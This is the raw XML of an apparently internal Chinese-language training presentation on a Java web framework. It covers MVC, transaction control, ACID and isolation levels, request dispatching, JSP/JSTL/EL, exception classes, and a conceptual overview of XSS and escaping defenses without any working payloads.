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8" r:id="rId4"/>
    <p:sldId id="279" r:id="rId5"/>
    <p:sldId id="280" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="283" r:id="rId8"/>
    <p:sldId id="281" r:id="rId9"/>
    <p:sldId id="284" r:id="rId10"/>
    <p:sldId id="285" r:id="rId11"/>
    <p:sldId id="286" r:id="rId12"/>
    <p:sldId id="287" r:id="rId13"/>
    <p:sldId id="288" r:id="rId14"/>
    <p:sldId id="258" r:id="rId15"/>
    <p:sldId id="259" r:id="rId16"/>
    <p:sldId id="260" r:id="rId17"/>
    <p:sldId id="262" r:id="rId18"/>
    <p:sldId id="261" r:id="rId19"/>
    <p:sldId id="268" r:id="rId20"/>
    <p:sldId id="263" r:id="rId21"/>
    <p:sldId id="270" r:id="rId22"/>
    <p:sldId id="269" r:id="rId23"/>
    <p:sldId id="264" r:id="rId24"/>
    <p:sldId id="265" r:id="rId25"/>
    <p:sldId id="266" r:id="rId26"/>
    <p:sldId id="267" r:id="rId27"/>
    <p:sldId id="271" r:id="rId28"/>
    <p:sldId id="272" r:id="rId29"/>
    <p:sldId id="273" r:id="rId30"/>
    <p:sldId id="274" r:id="rId31"/>
    <p:sldId id="275" r:id="rId32"/>
    <p:sldId id="28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8EB"/>
    <a:srgbClr val="6DE3FF"/>
    <a:srgbClr val="6DDCFF"/>
    <a:srgbClr val="9EDABB"/>
    <a:srgbClr val="61C390"/>
    <a:srgbClr val="98D795"/>
    <a:srgbClr val="6DFF7E"/>
    <a:srgbClr val="FF3F3F"/>
    <a:srgbClr val="FFB13F"/>
    <a:srgbClr val="FF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8" autoAdjust="0"/>
    <p:restoredTop sz="66256" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="58" d="100"/>
          <a:sy n="58" d="100"/>
        </p:scale>
        <p:origin x="1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FC1DE-A6DA-4017-9553-3C39AEEBAE8E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4A15D-43C4-42BC-8F47-5807BA179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MVC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>這種架構，也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>model…</a:t>
            </a:r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負責的工作為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>m.v.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就像三顆緊密相依的螺絲一樣個體間彼此是獨立的，擁有自己的齒輪大小，但是又必須互相配合才能讓機器，也就是我們的網站運轉</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>而使用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的好處就是我們可以讓專精於不統領域的人一起工作，例如有人前端比較強就負責打造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這顆齒輪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15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一旦使用</a:t>
            </a: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如果沒有執行  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Transaction.commit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則會進行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>auto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rollback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/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因此三個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>function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缺一不可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交易控制的優點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確保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commit/rollback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減少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跨子系統時可能會有權限問題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找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>searchedCaller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com.cathaybk.xx.dao.XX_CARS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去除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>com.cathaybk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得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>callerSubStr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xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，改為大寫後與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>inpudStartsWithStr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(DS_)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相加回傳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2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上述交易控制即是為了維持交易四大原則</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>原子性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資料庫單元操作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沒有全部執行，就都不能執行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一致性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假設「張三」客戶欲從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轉入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元到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，交易前「張三」在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元，在交易完成後，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的總和必須還是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元，因此，在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" alt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前</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" sz="1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的帳戶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總額是相同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隔離性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不會影響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其它交易的執行結果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或被其它交易所干擾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60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無交易控制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各自連線存取資料庫</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可能不滿足原子性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82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交易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共用連線</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>共用連線進行資料庫存取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>確保</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>commit/rollback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>正常運作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2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進行交易控制，除了共用連線之外，為了不讓交易互相影響，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>資料表有時需要進行鎖定，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DB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>需要有隔離層級，不同狀況採用不同的隔離層級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03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第一個交易修改資料，而第二個交易在第一個交易「確認前」讀取修改的資料。如果第一個交易中途發生故障，必須撤回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回復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的情況。第二個交易將取得不正確的資料。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247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在查詢時，而交易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卻還可以進行更新新增與刪除的問題，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無法重覆讀取到相同結果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55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兩次取得的筆數不相同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04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https://hackertarget.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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就是惡意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的程式碼在網站讀取時執行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，通常透過一些前端語言例如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來反映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例如有人在這個網頁放入惡意的程式碼，當使用者瀏覽這個網頁的時候就會啟動這個惡意程式嗎，這時候使用者的一些機密資料可能就會被竊取、傳回給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86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Reflection:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>網站會反映出輸入的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attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>發現更改帳密的時候透過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>變數來傳遞資料，這時候他就可以直接在變數上面放入惡意程式碼，然後透過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方式打包，再接結果寄給使用者，使用者若點選這個網址就會執行攻擊者放入的功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Dom:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 惡意程式碼的輸出位置在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>端，例如這個網址會將頁面導到一個利用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取值得網頁，且這個網頁會把取到的值直接當成網頁內容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ex.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(name)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>並把他們當成網頁中的內容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7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這張圖是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架構，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，也就是顯示畫面並且與使用者做第一線的互動</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>http dispatcher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txbean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>則是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，他們的工作類似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>deliverer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，或者說交通警察的功能，幫忙把使用者要求的訊息傳遞給後端，或把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的訊息帶回來前端</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Mod.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>共用模組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則是屬於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，他們的工作就是邏輯的處理，或者資料庫的異動請求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86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造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的攻擊主要在於具有特殊涵義的符號字元被當成指令來使用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8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再來介紹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的一些防禦方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以透過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的設定，例如這個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ajaxfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，他可以指定什麼時候要進行過濾。當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傳入之後，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可以進行過濾的功能，就像一層濾紙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>裡面去做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>doFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，當我故意在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欄輸入一個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，就會啟動她，最後會跳出這個小視窗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>儲存參數使用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fn:escapeXml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4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接下來要稍微介紹一下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的流程，首先在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啟動之後，會先將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做初始化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web.xml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Log4jAwareDispatche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，這個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裡面會進行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，裡面有個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>BeanProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>會清除快取，並且儲存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>m_namingMappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，裡面就是儲存主程式的相關資訊</a:t>
            </a:r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完成之後就會處於等待狀態，等待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的進入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breakpoint:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Log4jAwareDispatcher 40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BeanProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 54 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alwaysClearCache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59(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m_namingMappings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  <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>):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清掉快取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儲存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>m_namingMappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掃過所有檔案，儲存相關資訊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完接著進入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>request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64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的傳入，也就是使用者作出了請求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我們需要取得一串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才能對應到正確的程式與方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般情況下，我們要前往另一個頁面會直接給定一個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，例如利用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來導頁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>比較特別的是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不像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>prompt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>直接給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，因此需要其他方法取得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前面的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取得方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(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/XXWeb/servlet/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altLang="zh-TW" dirty="0" smtClean="0"/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${dispatcher}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include file=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“/html/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cathaybk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/common/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header.jsp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CXL:csCommon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“dispatcher” /&gt;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taglib uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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“/CXL” prefix=“CXL” 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it-IT" altLang="zh-TW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找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csCommon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>對應到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&lt;tag-class&gt;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com.cathay.common.tag.cs.CsCommonTag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&lt;/tag-class&gt;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strContext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=&gt;&gt;(/XXWeb + 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</a:t>
            </a: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CSRUtil.AjaxHandler.request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>裡調用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>jQuery or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529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CSRUtil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421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傳到後端找到對應的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10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之後，要將這串網址傳給</a:t>
            </a:r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Container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>也就是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會利用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去尋找對應的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，例如這邊就是對應到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>httpdispatcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，所以她就會去呼叫這個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因為有點好奇怎麼呼叫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，因此有去看底層程式碼的運作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request: breakpoint:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Log4jAwareDispatcher 157(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>doPost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70(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m_requestHandler.doTrx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上面雖然是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，但是底層還是都用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HtmlRequestHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 126(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141: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aconst_null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RequestHandler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137</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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144: aload_1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55(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super.doAction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114(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getBeanDescByAnnotation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呼叫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123(response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handler.execute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TxHandler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249(251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空白行進入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TxBean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 148 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=….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XXT0_0200 55(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)&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>trx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;&gt;mod&gt;&gt;….. &gt;&gt;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>回傳繼續執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>but</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>沒找了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1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這邊我們用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>來做舉例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用者再前端操作，傳送一個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，透過剛剛介紹的方法利用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找到對應的程式名稱與方法後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(XXT0_0200)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，程式就會呼叫對應的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，並且將資料傳送給他，讓她進行驗證處理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接著</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再把資料傳給對應的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，讓他對資料庫進行操作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67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從他的名稱就可以知道他跟前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有關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2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Language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方便讀取資料的一種語法，取得後端、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等資料，可判斷、運算，不可修改值、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可配合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981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JSTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>從字面上來看就是一個充滿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，他的功能是包裝常用方法，達到程式碼複用，不用每次都重新寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>scriptlet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，同時也因為表達比較精簡，可以讓程式碼更加美觀，例如如果使用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原本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>scriptlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，來做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判斷，頁面就會變得非常複雜與醜陋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5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6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9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60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4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6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B461-D95E-45A5-8B7E-DB796A94C901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9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02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JSTL&amp;EL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0397" y="3985974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JSP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39738" y="3983934"/>
            <a:ext cx="186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Standard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97735" y="3961112"/>
            <a:ext cx="81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Tag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5498" y="3991056"/>
            <a:ext cx="146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Library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904" y="4585297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Java Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Pages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54885" y="4015946"/>
            <a:ext cx="41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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Expression Language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48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靜態</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HTML: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JSP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Scriptlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: &lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>person.getAge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>() 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Directive: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;%@ page language="java" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>contentType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>=….%&gt;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EL: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>person.age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Action: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>jsp:getProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> property = “age” name=“person”/&gt;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51" y="1690688"/>
            <a:ext cx="2723285" cy="9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0566" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包裝常用方法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c:out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param.out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default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"out missing" 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endParaRPr lang="en-US" altLang="zh-TW" i="1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value - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>要輸出的內容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default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>裡面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>EL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>沒有值的時候，顯示的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>預設值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escapeXml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>是否要把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>輸出特殊標籤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(encoding)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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fmt:parseDate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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parseDate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"2013-10-14 10:00:00"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parseLocale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"Asia/Taipei" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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/>
              <a:t>方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>庫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"foo"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fn:escapeXml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param.foo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TW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2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Exception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82026" y="2190297"/>
            <a:ext cx="8592855" cy="4060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140134" y="2535100"/>
            <a:ext cx="2505205" cy="792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60997" y="522016"/>
            <a:ext cx="378703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RuntimeException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673523" y="3099308"/>
            <a:ext cx="418160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ModuleException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673523" y="4532543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04543" y="2541791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DataNotFoundException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04543" y="4207623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ErrorInput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673523" y="4765140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673523" y="5014615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39" name="肘形接點 38"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931505"/>
            <a:ext cx="1028184" cy="25403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5" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931505"/>
            <a:ext cx="1028184" cy="20582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29" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
